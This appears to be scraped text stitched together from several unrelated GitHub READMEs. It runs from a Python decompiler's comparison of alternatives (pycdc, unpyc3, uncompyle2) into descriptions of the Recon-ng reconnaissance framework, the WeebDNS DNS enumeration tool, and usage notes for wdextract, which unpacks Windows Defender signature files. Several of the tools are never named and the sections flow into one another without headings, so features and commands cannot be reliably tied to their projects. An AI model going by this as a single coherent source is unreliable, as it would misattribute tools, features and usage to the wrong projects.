Handling pathologically long lists of expressions or statements is slow. There is lots to do, so please dig in and help.
See Also
https://github.com/zrax/pycdc : purports to support all versions of Python. It is written in C++ and is most accurate for Python versions around 2.7 and 3.3 when the code was more actively developed. Accuracy for more recent versions of Python 3 and early versions of Python are especially lacking. See its issue tracker for details. Currently lightly maintained.
https://code.google.com/archive/p/unpyc3/ : supports Python 3.2 only. The above projects use a different decompiling technique than what is used here. Currently unmaintained.
https://github.com/figment/unpyc3/ : fork of above, but supports Python 3.3 only. Includes some fixes like supporting function annotations. Currently unmaintained.
https://github.com/wibiti/uncompyle2 : supports Python 2.7 only, but does that fairly well. There are situations where uncompyle6 results are incorrect while uncompyle2 results are not, but more often uncompyle6 is correct when uncompyle2 is not. Because uncompyle6 adheres to accuracy over idiomatic Python, uncompyle2 can produce more natural-looking code when it is correct. Currently uncompyle2 is lightly maintained. See its issue tracker for more details
Recon-ng is a full-featured reconnaissance framework designed with the goal of providing a powerful environment to conduct open-source web-based reconnaissance quickly and thoroughly.
Recon-ng has a look and feels similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Wiki to get started.
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. See the Development Guide for more information on building and maintaining modules.
DNS Enumeration Tool with Asynchronicity. Features WeebDNS is an 'Asynchronous' DNS Enumeration Tool made with Python3 which makes it much faster than normal Tools.
Bugs and enhancements For bug reports or enhancements, please open an issue here.
This is the official and only repository of the WeebDNS project. Written by: FuzzyRabbit - Twitter: @rabbit_fuzzy, GitHub: @FuzzyRabbit DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period. Please read the LICENSE for the licensing of WeebDNS.
file - filename of VDM container (*.vdm file or MRT.exe executable);
-e optional parameter, extract all found PE image chunks found in VDM after unpacking/decrypting (this including VFS components and emulator VDLLs).
Example:
wdextract c:\wdbase\mpasbase.vdm
wdextract c:\wdbase\mpasbase.vdm -e
wdextract c:\wdbase\mrt.exe
wdextract c:\wdbase\mrt.exe -e
Note: base will be unpacked/decrypted to source directory as %originalname%.extracted (e.g. if original file c:\wdbase\mpasbase.vdm, unpacked will be c:\wdbase\mpasbase.vdm.extracted). Image chunks will be dumped to created "chunks" directory in the wdextract current directory (e.g. if wdextract run from c:\wdbase it will be c:\wdbase\chunks directory). Output files always overwrite existing.
Build
Source code written in C;
Built with MSVS 2017 with Windows SDK 17763 installed;
Can be built with previous versions of MSVS and SDK's.